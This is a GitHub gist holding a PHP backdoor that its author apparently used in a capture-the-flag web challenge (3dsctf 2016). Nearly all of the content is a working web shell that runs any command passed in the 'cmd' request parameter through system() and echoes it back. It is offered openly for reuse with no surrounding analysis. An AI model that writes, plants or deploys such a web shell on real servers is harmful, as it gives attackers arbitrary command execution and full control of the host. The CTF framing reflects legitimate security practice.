Skip to content

Instantly share code, notes, and snippets.

@intrd
Last active October 16, 2021 13:12
Show Gist options
  • Save intrd/821e6284ea6505befd911997f04cd833 to your computer and use it in GitHub Desktop.
Save intrd/821e6284ea6505befd911997f04cd833 to your computer and use it in GitHub Desktop.
PHP backdoor used in web200-mapos @ 3dsctf-2k16
## PHP backdoor used in web200-mapos @ 3dsctf-2k16
# @author intrd - http://dann.com.br/
# @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/
<?php
if(isset($_REQUEST['cmd'])){
$cmd = ($_REQUEST["cmd"]);
system($cmd);
echo "</pre>$cmd<pre>";
die;
}
?>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment